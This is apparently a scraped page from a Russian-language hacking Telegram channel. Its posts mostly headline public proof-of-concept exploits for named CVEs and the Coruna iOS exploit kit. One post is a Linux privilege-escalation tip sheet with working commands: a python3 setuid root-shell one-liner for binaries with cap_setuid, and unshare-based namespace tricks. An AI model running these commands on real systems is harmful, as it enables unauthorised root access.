Proxy Bar
20.3K subscribers
1.5K photos
95 videos
669 files
1.53K links
Exploits, Hacking and Leaks

Чат группы - https://t.iss.one/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Случился квантовый похек
мало кто знает, НО
Алексей Михайлович наш слоняра
🔥36
0_о
docker завезли .
Ну то есть теперь можно не через valgrind поднимать сотню " своих заряженных" контейнеров, а прям с докерХаба.
🔥25👍5
WordPress Backup Migration 1.3.7 -
*
Remote Command Execution
👍7😱2
This media is not supported in your browser
VIEW IN TELEGRAM
Sexy/UNsexy software
руки на стол !!!
🔥41👍7
CVE-2026-20127
*
Cisco-SD-WAN-Preauth-RCE

war
👍12
Есть такой Coruna iOS Exploit Kit
*
А вот парочка восстановленных имплантов из этого Exploit Kit
👍16🔥4
CVE-2026-21902
*
Juniper Junos Evolved
*
Pre-Auth RCE
👍8😱2
Cisco Secure Firewall Management Center Software Remote Code Execution Vulnerability
*
Read
🔥13👍5
CVE-2026-29000
*
pac4j-jwt authentication bypass public-key

CVSS: 10
*
The Full Proof of Concept
👍12
UPD to https://t.iss.one/proxy_bar/3185 CVE-2026-20127
*
В Cisco SD-WAN honeypot начали массово прилетать веб-шеллы.
Маховичок крутится.
👍13
Хорошо то как)))
ГиперТекстовыйТранспортныйПротоколБезопасный://ВсемирнаяПаутина.аладдин-рд.ру/помощь/загрузки/джакарта/джакартаюси-астра/энд/випнетХэВэТыща
🔥37👍9😱5
Рубрика На заметку $[email protected] - part 8
*

*
Linux давно ушёл от модели root / non-root. Все равны, но кто то р@вн33 ) Появились Capabilities !
Отдельные привилегии , дающие значок шерифа (например меняя UID).

Проверка capabilities:
getcap -r / 2>/dev/null
# и если например:
/usr/bin/python3 = cap_setuid+ep
# то бинарь может менять UID, значит сразу можно забрать root shell
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

опасные capabilities:
CAP_SYS_PTRACE # читать память процессов
CAP_SYS_ADMIN # почти root
CAP_DAC_OVERRIDE # игнорить права файлов
CAP_NET_ADMIN # рулить сетью
CAP_SETUID # менять UID

Кстати иногда админы отдают capability вместо SUID, это ниразу не секурнее, это ТОТ ЖЕ PrivEsc.
*
*

Namespaces Abuse
Вообще namespaces изолируют ресурсы: PID, NET, MNT, USER, UTS, IPC. И если словить мисконф или научиться солить, то можно в PrivEsc.
Namespacы дают получить root в изолированной среде и затем сразу же атаковать ядро.
#Чекаем, можно ли вообще трюкачить в user namespace
cat /proc/sys/kernel/unprivileged_userns_clone
1 = $USER может создать namespace

#cоздаём namespace (где -r root внутри namespace, -m новый mount namespace)
unshare -r -m bash
id
uid=0(root)

А уж внутри....... можно маунтить filesystem, юзать overlayfs, девайсы создавать. Во многих kernel privilege escalation присутствует.
То есть можно:
mkdir lower upper work merged

И смонтировать overlay = OverlayFS/FUSE/kernel permission bypass

Вообще NS поле не паханное, которое вываливается за горизонт событий, а если еще и misconf рядом есть, ну это ключи of kingdo0m

#РубрикаНаЗаметкуХакеру
🔥13👍11
Внутри Coruna: реверс-инжиниринг государственного набора эксплойтов для iOS from JavaScript
*
Research
*
DownLoad Coruna DUMP
🔥16😱9
unable to locate 😭
Вообще считаю что Отечественные ОС должны выдавать sudo через MAX
👍39😱21🔥13
Bypassing Detections with Command-Line Obfuscation
*
Read
🔥18👍10😱4
🔥13😱5👍3
What Windows Server 2025 Quietly Did to Your NTLM Relay

Game over.
👍11🔥7
Nginx-UI Vulnerable to Unauthenticated Backup Download with Encryption Key Disclosure
*
POC
😱13👍8🔥1
CVE-2025-69219 — Apache Airflow Providers HTTP RCE
*
PoC
🔥12👍5
CVE-2026-28292: RCE in simple-git

Full Proof of Concept
👍12